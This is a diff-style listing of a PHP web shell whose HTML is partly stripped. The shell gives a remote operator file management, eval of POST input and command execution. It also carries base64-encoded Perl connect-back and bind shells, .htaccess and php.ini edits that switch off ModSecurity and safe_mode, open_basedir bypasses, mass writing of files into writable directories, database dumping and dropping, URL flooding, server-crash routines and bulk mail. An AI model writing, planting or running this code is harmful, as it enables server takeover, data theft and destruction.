          + + +".$end;exit; + +} +function deleteDirectory($dir) { +if (!file_exists($dir)) return true; +if (!is_dir($dir) || is_link($dir)) return unlink($dir); +foreach (scandir($dir) as $item) { +if ($item == '.' || $item == '..') continue; +if (!deleteDirectory($dir . "/" . $item)) { +chmod($dir . "/" . $item, 0777); +if (!deleteDirectory($dir . "/" . $item)) return false; +};}return rmdir($dir);} + +function download($fileadd,$finame){ +$dlfilea=$fileadd.$finame; +header("Content-Disposition: attachment; filename=" . $finame); +header("Content-Type: application/download"); +header("Content-Length: " . filesize($dlfilea)); +flush(); +$fp = fopen($$dlfilea, "r"); +while (!feof($fp)) +{ + echo fread($fp, 65536); + flush(); +} +fclose($fp); +} +if($_GET['do']=="rename"){ +echo $head.$formp.$nowaddress.'

          To

          '.$end;exit; +} + +if ($_GET['byapache']=='ofms'){ +$fse=fopen(getcwd().$slash.".htaccess","w"); +fwrite($fse,' + Sec------Engine Off + Sec------ScanPOST Off +'); +fclose($fse); +}elseif ($_GET['byapache']=='bysap'){ +$fse=fopen(getcwd().$slash.".htaccess","w"); +fwrite($fse,'Options +FollowSymLinks +DirectoryIndex Persian-Gulf-For-Ever.html'); +fclose($fse); +}elseif ($_GET['byapache']=='sfadf'){ +$fse=fopen(getcwd().$slash."php.ini","w"); +fwrite($fse,'safe_mode=OFF +disable_functions=NONE'); +fclose($fse); +} +if($_GET['do']=="apache"){ +echo $head.$formg.$nowaddress.'

          +

          '.$end;exit; +} +if($_GET['do']=="dd0s"){ +echo $head.$formg.$nowaddress.'

          Address : Time :

          '.$end;exit; +} + +if($_GET['urldd0'] && $_GET['timedd0']){ +for ($id=0;$$id<$_GET['timedd0'];$id++){ +$fp=null; +$contents=null; +$fp=fopen($_GET['urldd0'],"rb"); +while (!feof($fp)) { + $contents .= fread($fp, 8192); +} +fclose($fp); +}} +if($_GET['do']=="dlfile"){ +echo $head.$formp.$nowaddress.'

          ļ!
          Address :
          Save To :

          '.$end;exit; +} +function dirpe($addres){ +global $slash; +$idd=0; +if ($dirhen = @opendir($addres)) { +while ($file = readdir($dirhen)) { +$permdir=str_replace('//','/',$addres.$slash.$file); +if($file!='.' && $file!='..' && is_dir($permdir)){ +if (is_writable($permdir)) { +$dirdata[$idd]['filename']=$permdir; +$idd++; +} +dirpe($permdir); + } + } + closedir($dirhen); + } else { + return ("notperm"); + } + if ($dirdata){ + return $dirdata; + }else{ + return "notfound"; + + } +} +function dirpmass($addres,$massname,$masssource){ +global $slash; +$idd=0; +if ($dirhen = @opendir($addres)) { +while ($file = readdir($dirhen)) { +$permdir=str_replace('//','/',$addres.$slash.$file); +if($file!='.' && $file!='..' && is_dir($permdir)){ +if (is_writable($permdir)) { +if ($fm=fopen($permdir.$slash.$massname,"w")){ +fwrite($fm,$masssource); +fclose($fm); +$dirdata[$idd]['filename']=$permdir; +} + +$idd++; +} +dirpmass($permdir); + } + } + closedir($dirhen); + } else { + return ("notperm"); + } + if ($dirdata){ + return $dirdata; + }else{ + return "notfound"; + + } +} +if($_GET['do']=="perm"){ +echo $head.$formp.'

          Find All Folder Writeable

          '.$end;exit; +} +if ($_POST['affw']){ +$arrfilelist=dirpe($_POST['affw']); +if ($arrfilelist=='notfound'){ +alert("Not Found !"); +}elseif($arrfilelist=='notperm'){ +alert("Permission Denied !"); +}else{ +foreach ($arrfilelist as $tmpdir){ + if ($coi %2){ +$colort='"#e7e3de"'; +}else{ +$colort='"#e4e1de"';} +$coi++; +$permdir=$permdir.' + + +

          '.$tmpdir['filename'].'

          '; +} +echo $head.' + + +

          Now Directory : '.getcwd()."
          ".printdrive().'
          Back

          '.$permdir.' + + + + + + + + + + + + +'.$end;exit; +}} +if($_GET['do']=="mass"){ +echo $head.$formp.'

          []


          '.$end;exit; +} +if ($_POST['mffw']){ +$arrfilelist=dirpmass($_POST['mffw'],$_POST['massname'],$_POST['masssource']); +if ($arrfilelist=='notfound'){ +alert("Not Found !"); +}elseif($arrfilelist=='notperm'){ +alert("Permission Denied !"); +}else{ +foreach ($arrfilelist as $tmpdir){ + if ($coi %2){ +$colort='"#e7e3de"'; +}else{ +$colort='"#e4e1de"';} +$coi++; +$permdir=$permdir.'
          +
          '.$formg.'Change Directory
          +Upload --->   +
          '.$nowaddress.' + +
          '.$ifupload.'
          +'.$formp.'Chmod ---->  File : +
            Permission :
          +'.$formp.'Create Dir ----> Dirctory Name + +'.$nowaddress.'
          +'.$formp.'Create File ----> Name File +'.$nowaddress.'
          +'.$formp.'Copy ---->  File : + To Directory
          + + +

          '.$tmpdir['filename'].'

          '; +} +echo $head.' + + +

          Now Directory : '.getcwd()."
          ".printdrive().'
          Back

          '.$permdir.' + + + + + + + + + + + + +'.$end;exit; +}} +if($_POST['adlr'] && $_POST['adsr']){ +$url = $_POST['adlr']; +$newfname = $_POST['adsr'] . basename($url); +$file = fopen ($url, "rb"); +if ($file) { + $newf = fopen ($newfname, "wb"); + if ($newf) + while(!feof($file)) { + fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 ); + } + alert("File Downloaded Success"); +}else{alert("Can Not Open File");} +if ($file) { + fclose($file); +} +if ($newf) { + fclose($newf); +} +} +if($_GET['do']=="down" and $_GET['type']=='file'){ +download($_GET['address'],$_GET['filename']);} +if($_GET['do']=="down" and $_GET['type']=='dir'){ +class zipfile +{ +var $datasec = array(); +var $ctrl_dir = array(); +var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; +var $old_offset = 0; +function add_dir($name) +{ +$name = str_replace("\\", "/", $name); +$fr = "\x50\x4b\x03\x04"; +$fr .= "\x0a\x00"; +$fr .= "\x00\x00"; +$fr .= "\x00\x00"; +$fr .= "\x00\x00\x00\x00"; +$fr .= pack("V",0); +$fr .= pack("V",0); +$fr .= pack("V",0); +$fr .= pack("v", strlen($name) ); +$fr .= pack("v", 0 ); +$fr .= $name; +$fr .= pack("V",$crc); +$fr .= pack("V",$c_len); +$fr .= pack("V",$unc_len); +$this -> datasec[] = $fr; +$new_offset = strlen(implode("", $this->datasec)); +$cdrec = "\x50\x4b\x01\x02"; +$cdrec .="\x00\x00"; +$cdrec .="\x0a\x00"; +$cdrec .="\x00\x00"; +$cdrec .="\x00\x00"; +$cdrec .="\x00\x00\x00\x00"; +$cdrec .= pack("V",0); +$cdrec .= pack("V",0); +$cdrec .= pack("V",0); +$cdrec .= pack("v", strlen($name) ); +$cdrec .= pack("v", 0 ); +$cdrec .= pack("v", 0 ); +$cdrec .= pack("v", 0 ); +$cdrec .= pack("v", 0 ); +$ext = "\x00\x00\x10\x00"; +$ext = "\xff\xff\xff\xff"; +$cdrec .= pack("V", 16 ); +$cdrec .= pack("V", $this -> old_offset ); +$this -> old_offset = $new_offset; +$cdrec .= $name; +$this -> ctrl_dir[] = $cdrec; +} +function add_file($data, $name) +{ +$name = str_replace("\\", "/", $name); +$fr = "\x50\x4b\x03\x04"; +$fr .= "\x14\x00"; +$fr .= "\x00\x00"; +$fr .= "\x08\x00"; +$fr .= "\x00\x00\x00\x00"; +$unc_len = strlen($data); +$crc = crc32($data); +$zdata = gzcompress($data); +$zdata = substr( substr($zdata, 0, strlen($zdata) - 4), 2); +$c_len = strlen($zdata); +$fr .= pack("V",$crc); +$fr .= pack("V",$c_len); +$fr .= pack("V",$unc_len); +$fr .= pack("v", strlen($name) ); +$fr .= pack("v", 0 ); +$fr .= $name; +$fr .= $zdata; +$fr .= pack("V",$crc); +$fr .= pack("V",$c_len); +$fr .= pack("V",$unc_len); +$this -> datasec[] = $fr; +$new_offset = strlen(implode("", $this->datasec)); +$cdrec = "\x50\x4b\x01\x02"; +$cdrec .="\x00\x00"; +$cdrec .="\x14\x00"; +$cdrec .="\x00\x00"; +$cdrec .="\x08\x00"; +$cdrec .="\x00\x00\x00\x00"; +$cdrec .= pack("V",$crc); +$cdrec .= pack("V",$c_len); +$cdrec .= pack("V",$unc_len); +$cdrec .= pack("v", strlen($name) ); +$cdrec .= pack("v", 0 ); +$cdrec .= pack("v", 0 ); +$cdrec .= pack("v", 0 ); +$cdrec .= pack("v", 0 ); +$cdrec .= pack("V", 32 ); +$cdrec .= pack("V", $this -> old_offset ); +$this -> old_offset = $new_offset; +$cdrec .= $name; +$this -> ctrl_dir[] = $cdrec; +} +function file() { +$data = implode("", $this -> datasec); +$ctrldir = implode("", $this -> ctrl_dir); +return +$data. +$ctrldir. +$this -> eof_ctrl_dir. +pack("v", sizeof($this -> ctrl_dir)). +pack("v", sizeof($this -> ctrl_dir)). +pack("V", strlen($ctrldir)). +pack("V", strlen($data)). +"\x00\x00"; +} +} +$dlfolder=$_GET['address'].$slash.$_GET['dirname'].$slash; +$zipfile = new zipfile(); +function get_files_from_folder($directory, $put_into) { +global $zipfile; +if ($handle = opendir($directory)) { +while (false !== ($file = readdir($handle))) { +if (is_file($directory.$file)) { +$fileContents = file_get_contents($directory.$file); +$zipfile->add_file($fileContents, $put_into.$file); +} elseif ($file != '.' and $file != '..' and is_dir($directory.$file)) { +$zipfile->add_dir($put_into.$file.'/'); +get_files_from_folder($directory.$file.'/', $put_into.$file.'/'); +} +} +} +closedir($handle); +} +$datedl=date("y-m-d"); +get_files_from_folder($dlfolder,''); +header("Content-Disposition: attachment; filename=" . $_GET['dirname']."-".$datedl.".zip"); +header("Content-Type: application/download"); +header("Content-Length: " . strlen($zipfile -> file())); +flush(); +echo $zipfile -> file(); +$filename = $_GET['dirname']."-".$datedl.".zip"; +$fd = fopen ($filename, "wb"); +$out = fwrite ($fd, $zipfile -> file()); +fclose ($fd); +} +if ($_REQUEST['cdirname']){ +if(mkdir($_REQUEST['cdirname'],"0777")){alert("Directory Created !");}else{alert("Permission Denied !");}} +function bcn($ipbc,$pbc){ +$bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3 +NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb +MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw +dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n +IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo +YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN +LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0 +KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll +KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog +IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4 +ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow=="; +$opbc=fopen("bcc.pl","w"); +fwrite($opbc,base64_decode($bcperl)); +fclose($opbc); +system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For shell Disable_functions Or Safe Mode"); +} +function wbp($wb){ +$wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj +cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j +a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu +ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs +IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl +IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO +VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT +VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g"; +$opwb=fopen("wbp.pl","w"); +fwrite($opwb,base64_decode($wbp)); +fclose($opwb); +echo getcwd(); +system("perl wbp.pl $wb") or die("I Can Not Execute Command For shell Disable_functions Or Safe Mode"); +} +function lbp($wb){ +$lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv +YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg +U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF +VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO +QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw +dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7 +b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o +Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g"; +$oplb=fopen("lbp.pl","w"); +fwrite($oplb,base64_decode($lbp)); +fclose($oplb); +system("perl lbp.pl $wb") or die("I Can Not Execute Command For shell Disable_functions Or Safe Mode"); +} + +if($_REQUEST['portbw']){ +wbp($_REQUEST['portbw']); + +}if($_REQUEST['portbl']){ +lbp($_REQUEST['portbl']); +} +if($_REQUEST['ipcb'] && $_REQUEST['portbc']){ +bcn($_REQUEST['ipcb'],$_REQUEST['portbc']); + +} + +if($_REQUEST['do']=="bc"){ +echo $head.$formp."

          Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


          <<<<<< shell >>>>>>
          Ip Address : Port :
          ".$formp."

          Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


          <<<<<< Windows Bind Port >>>>>>
          Port :
          ".$formp."

          Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


          <<<<<< Linux Bind Port >>>>>>
          Port :
          ".$end;exit; + +} +function copyf($file1,$file2,$filename){ +global $slash; +$fpc = fopen($file1, "rb"); +$source = ''; +while (!feof($fpc)) { +$source .= fread($fpc, 8192); +} +fclose($fpc); +$opt = fopen($file2.$slash.$filename, "w"); +fwrite($opt, $source); +fclose($opt); +} +if ($_REQUEST['copyname'] && $_REQUEST['cpyto']){ +if(is_writable($_REQUEST['cpyto'])){ +echo $_REQUEST['address']; +copyf($_REQUEST['address'].$slash.$_REQUEST['copyname'],$_REQUEST['cpyto'],$_REQUEST['copyname']); +}else{alert("Permission Denied !");}} +if($_REQUEST['cfilename']){ + +echo $head.$formp.$nowaddress.'

          Create File


          '.$end;exit; +} + +if($_REQUEST['nf4c'] && $_REQUEST['nf4cs']){ +if($ofile4c=fopen($_REQUEST['nf4c'],"w")){ +fwrite($ofile4c,$_REQUEST['nf4cs']); +fclose($ofile4c); +alert("File Saved !");}else{alert("Permission Denied !");}} + +function sqlclienT(){ +global $t,$errorbox,$et,$hcwd; +if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){ +$server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY']; +$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB']; +$_SESSION[server]=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST['typE'];$_SESSION[pass]=$_REQUEST['pasS'];$_SESSION[user]=$_REQUEST['useR']; + +} + +if (isset ($_GET[select_db])){ + $getdb=$_GET[select_db]; + $_SESSION[db]=$getdb; + $query="SHOW TABLES"; + $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); +} +elseif (isset ($_GET[select_tbl])){ + $tbl=$_GET[select_tbl]; + $_SESSION[tbl]=$tbl; + $query="SELECT * FROM `$tbl`"; + $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); +} +elseif (isset ($_GET[drop_db])){ + $getdb=$_GET[drop_db]; + $_SESSION[db]=$getdb; + $query="DROP DATABASE `$getdb`"; + querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'',$query); + $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'','SHOW DATABASES'); +} +elseif (isset ($_GET[drop_tbl])){ + $getbl=$_GET[drop_tbl]; + $query="DROP TABLE `$getbl`"; + querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); + $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],'SHOW TABLES'); +} +elseif (isset ($_GET[drop_row])){ + $getrow=$_GET[drop_row]; + $getclm=$_GET[clm]; + $query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'"; + $tbl=$_SESSION[tbl]; + querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); + $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],"SELECT * FROM `$tbl`"); +} +else + $res=querY($type,$server,$user,$pass,$db,$query); + +if($res){ +$res=htmlspecialchars($res); +$row=array (); +$title=explode('[+][+][+]',$res); +$trow=explode('[-][-][-]',$title[1]); +$row=explode('|+|+|+|+|+|',$title[0]); +$data=array(); +$field=$trow[count($trow)-2]; +if (strstr($trow[0],'Database')!='') + $obj='db'; +elseif (substr($trow[0],0,6)=='Tables') + $obj='tbl'; +else + $obj='row'; +$i=0; +foreach ($row as $a){ +if($a!='') +$data[$i++]=explode('|-|-|-|-|-|',$a); +} + +echo "

          +
          '.$formg.'Change Directory
          +Upload --->   +
          '.$nowaddress.' + +
          '.$ifupload.'
          +'.$formp.'Chmod ---->  File : +
            Permission :
          +'.$formp.'Create Dir ----> Dirctory Name + +'.$nowaddress.'
          +'.$formp.'Create File ----> Name File +'.$nowaddress.'
          +'.$formp.'Copy ---->  File : + To Directory
          "; +foreach ($trow as $ti) +echo ""; +echo ""; +$j=0; +while ($data[$j]){ + echo ""; + foreach ($data[$j++] as $dr){ + echo ""; + } + echo ""; +} +echo "
          $ti
          "; + if($obj!='row') echo ""; + echo $dr; + if($obj!='row') echo ""; + echo "Drop

          "; + +} + + + + + +if(empty($_REQUEST['typE']))$_REQUEST['typE']=''; +echo "

          Connect to Database

          DB Type:
          Server Address:
          Username:
          Password:

          Submit a Query

          DB Name:
          Query:
          $hcwd
          $et
          "; +} + + +function querY($type,$host,$user,$pass,$db='',$query){ +$res=''; +switch($type){ +case 'MySQL': +if(!function_exists('mysql_connect'))return 0; +$link=mysql_connect($host,$user,$pass); +if($link){ +if(!empty($db))mysql_select_db($db,$link); +$result=mysql_query($query,$link); +if ($result!=1){ +while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|'; +$res.='[+][+][+]'; +for($i=0;$i
          '; + +curl_close($ch); +} +if ($_REQUEST['bypcu']){ +bypcu($_REQUEST['bypcu']); +} +if($_REQUEST['do']=="bypasscmd"){ +if($_POST['bycw']){ +echo $_POST['bycw']; +$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll'); + $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['bycw'].""); + $stdout = $exec->StdOut(); + $stcom = $stdout->ReadAll();} + +echo $head.'


          Bypass Safe_Mode And Disable_Functions In Windows Server
          '.$formp.'Command
          Bypass Safe_Mode Windows Server
          '.$formp.'Command
          '.$end;exit;; +} +if($_REQUEST['do']=="bypassdir"){ +if($_POST['byoc']){ +if(copy("compress.zlib://".$_POST['byoc'], getcwd()."/"."peji.txt")){ +$bopens="Bypass Succesfull Plz Read File Peji.txt In This Folder"; +}else{$bopens="Can Not Bypass This";} +} +if($_POST['byfc']){ +curl_init("file:///".$_POST['byfc']."\x00/../../../../../../../../../../../../".__FILE__); +$debfc=curl_exec($ch); +} +if($_POST['byetc']){ +for($bye=0;$bye<40000;$bye++){ +$sbep =$sbep. posix_getpwuid($bye); +}} +if($_POST['byfc9']){ +echo "not sucsfull"; +} +if($_REQUEST['bysyml']){ +$file=$_REQUEST['bysyml']; +bywsym($file); +} +echo $head.'


          Bypass Safe_Mode And Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2
          '.$formp.'Address File

          Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.4.2 and 5.1.4
          '.$formp.'Address File

          Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X ... 5.2.9
          '.$formp.'Address File

          Bypass /Etc/Passwd
          '.$formp.'
          Bypass With ini_restore'.$formp.'
          Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink
          '.$formp.'

          '.$formp.'Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... 5.2.9
          '.$formp.'
          '.$end;exit;; + + + + +} +function printdrive(){ +global $slash; +foreach (range("A","Z") as $tempdrive) { +if (is_dir($tempdrive.":".$slash)){ +$adri=$tempdrive.":".$slash; +$drivea=$drivea.''.$tempdrive.':'.$slash.' '; +} +} +return $drivea; +} +if($_POST['nameren'] && $_POST['addressren']){ +if(is_writable($_REQUEST['addressren'])){ + +rename($_POST['addressren'],$_POST['nameren']);alert("Rename Successful !"); +}else{alert("Permission Denied !");} +} +if($_GET['do']=="delete"){ + +if ($_GET['type']=="dir"){ +if(is_writable($_REQUEST['address'])){ +$dir=$_GET['address'].$_GET['filename']; +deleteDirectory($dir); +alert("Deleted Successful !"); +}else{alert("Permission Denied !");} +}elseif($_GET['type']=="file"){ +if(is_writable($_GET['address'].$_GET['filename'])){ +unlink($_GET['address'].$_GET['filename']);alert("Deleted Successful !"); +}else{alert("Permission Denied !");} +} +} +if($_POST['fedit'] && $_POST['namefe']){ +if(is_writable($_REQUEST['address'])){ + + +$opensave=fopen($_POST['address'].$slash.$_POST['namefe'],"w"); +fwrite($opensave,html_entity_decode($_POST['fedit'])); +fclose($opensave);alert("File Saved Successful !"); +}else{alert("Permission Denied !");} +} +if ($_POST['evalsource']){ + +eval($_POST['evalsource']); +} +if($_GET['do']=="eval"){ +echo $head.$formp.$nowaddress.'


          '.$end;exit; +} +if($_GET['do']=="info"){ + +if(ini_get('register_globals')){ +$registerg="Enable"; +}else{ +$registerg="disable"; +} +if(extension_loaded('curl')){ +$curls="Enable"; +}else{ +$curls="disable"; +} +if(@function_exists('mysql_connect')){ +$db_on = "Mysql : On"; +}; +if(@function_exists('mssql_connect')){ +$db_on = "Mssql : On"; +}; +if(@function_exists('pg_connect')){ +$db_on = "PostgreSQL : On"; +};if(@function_exists('ocilogon')){ +$db_on = "Oracle : On"; +}; + +echo $head."Operating System : ".php_uname()."
          Server Name : ".$_SERVER['HTTP_HOST']."
          Disable_Functions : ".$disablef."
          Safe_Mode : ".$safe_modes."
          Openbase_dir : ".ini_get('openbase_dir')."
          Php Version : ".phpversion()."
          Free Space : ".sizee(disk_free_space("/"))."
          Total Space : ".sizee(disk_total_space("/"))."
          Register_Globals : ".$registerg."
          Curl : ".$curls."
          Database ".$db_on."
          Server Name : ".$_SERVER['HTTP_HOST']."
          Admin Server : ".$_SERVER['SERVER_ADMIN'].$end; +exit; +} +if ($_GET['do']=="cmd"){ +echo $head.' +
          +

          +

          + +

          '.$end;exit;} +if ($_GET['do']=="symlink"){ +echo $head.' +
          +

          +SymLink With PHP
          TO


          +

          + +SymLink With OS :
          TO
          +

          '.$end;exit;} +if ($_POST['ad1syp'] && $_POST['ad2syp']){ +if (symlink($_POST['ad1syp'],$_POST['ad2syp'])){ +alert("Symlink Worked !"); +}else{ +alert("Symlink Not Worked !"); +}} +if ($_POST['ad1syc'] && $_POST['ad2syc']){ +if (system('ls -s '.$_POST['ad1syc']." ".$_POST['ad2syc'])){ +alert("Symlink Worked !"); +}else{alert("Symlink Not Worked !");} +} +if ($_GET['do']=="d0slocal"){ +echo $head.' +

          If You Click This Link This Server Crashed.
          This Worked In Php 5.3.x : Dos This Server I Am Sure
          This Worked In Php 4.x.x And 5.2.9 : Dos This Server I Am Sure '.$end;exit;} +if ($_GET['dosthisserver']=="1"){ +function dosserver(){ +$junk=str_repeat("99999999999999999999999999999999999999999999999999",99999); +for($i=0;$i<2;){ +$buff=bcpow($junk, '3', 2); +$buff=null; +} +} +dosserver(); +} +if ($_GET['dosthisserver']=="2"){ +function cx(){cx();} + cx(); +} +if ($_GET['do']=="ת"){ +$hash=null; +if ($_GET['stringtoh'] && $_GET['hashtoh']=='md5'){ +$hash=md5($_GET['stringtoh']); +}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='sh1'){ +$hash=sha1($_GET['stringtoh']); +}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='crc32'){ +$hash=crc32($_GET['stringtoh']); +}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64e'){ +$hash=base64_encode($_GET['stringtoh']); +}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64d'){ +$hash=base64_decode($_GET['stringtoh']); +} +echo $head.' +

          +

          ת
          +
          + +

          '.$end;exit;} +if ($_GET['do']=="dump"){ +echo $head.'

          '; +echo '

          ݿ

          DB Type:
          Server:
          Username:
          Password:
          ݿ Name:

          '.$end;exit;} +if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){ +$date = date("Y-m-d"); +$dbserver = $_POST['server']; +$dbuser = $_POST['username']; +$dbpass = $_POST['password']; +$dbname = $_POST['dbname']; +$file = "Dump-$dbname-$date"; +$method = $_POST['method']; +if ($method=='sql'){ +$file="Dump-$dbname-$date.sql"; +$fp=fopen($file,"w"); +}else{ +$file="Dump-$dbname-$date.sql.gz"; +$fp = gzopen($file,"w"); +} +function write($data) { +global $fp; +if ($_POST['method']=='sql'){ +fwrite($fp,$data); +}else{ +gzwrite($fp, $data); +}} +mysql_connect ($dbserver, $dbuser, $dbpass); +mysql_select_db($dbname); +$tables = mysql_query ("SHOW TABLES"); +while ($i = mysql_fetch_array($tables)) { + $i = $i['Tables_in_'.$dbname]; + $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i)); + write($create['Create Table'].";\n\n"); + $sql = mysql_query ("SELECT * FROM ".$i); + if (mysql_num_rows($sql)) { + while ($row = mysql_fetch_row($sql)) { + foreach ($row as $j => $k) { + $row[$j] = "'".mysql_escape_string($k)."'"; + } + write("INSERT INTO $i VALUES(".implode(",", $row).");\n"); + } + } +} +if ($method=='sql'){ +fclose ($fp); +}else{ +gzclose($fp);} +header("Content-Disposition: attachment; filename=" . $file); +header("Content-Type: application/download"); +header("Content-Length: " . filesize($file)); +flush(); + +$fp = fopen($file, "r"); +while (!feof($fp)) +{ + echo fread($fp, 65536); + flush(); +} +fclose($fp); +} + +if ($_GET['do']=="mail"){ +echo $head.' +
          +

          +Address :

          Subject :



          Number For Send :

          '.$end;exit;} +if ($_POST['admail'] && $_POST['submail'] ){ +for($mi=0;$miChmod
          To
          ".$end;exit; + +} +/* if($_GET['do']=="edit"){ +if($_GET['filename']=="dir"){ +if(is_readable($_GET['address'])){ +chdir($_GET['address']);}else{alert("Permission Denied !");} + +}} */ +$araddresss=explode($slash,getcwd()); +$matharrayy=count($araddresss)-1; +$addr1backk=str_replace($araddresss[$matharrayy],"",$araddresss); +for($countback=0;$countback=1){ +$rr=str_replace($basep,"",getcwd()); +$rr=str_replace("\\","/",$rr); +$diropen=''.$parsef.''; +}else{ +$diropen=''.$parsef.''; +} +return $diropen; +} +if ($_GET['address']){$ifget=$_GET['address'];}if($_POST['address']){$ifget=$_POST['address'];} +if($cwd==''){$cwd=getcwd();}$nowaddress=''; +$ad=getcwd(); +$hand=opendir("$ad"); +$coi=0; +$coi2=0; + +while (false !== ($fileee = readdir($hand))) { + + + if ($fileee != "." && $fileee != "..") { + if (filetype($fileee)=="dir"){ + if ($coi %2){ +$colort='"#e7e3de"'; +}else{ +$colort='"#e4e1de"'; + +} +$coi++; +$fil=$fil.' + + +

          '.$fileee.'

          '.date("y/m/d", filectime($fileee)).''.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'DLRenDel
          ' +;} +else{ + + if ($coi2 %2){ +$colort='"#e7e3de"'; +}else{ +$colort='"#e4e1de"'; +} + +$coi2++; +$file=$file.' + + +

          '.openf($fileee).'

          '.sizee(filesize($fileee)).''.date("y/m/d", filectime($fileee)).''.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'EditDLRenDel
          ' +;} +} +} +echo $head.' + + +

          Now Directory : '.getcwd()."
          ".printdrive().'
          Back

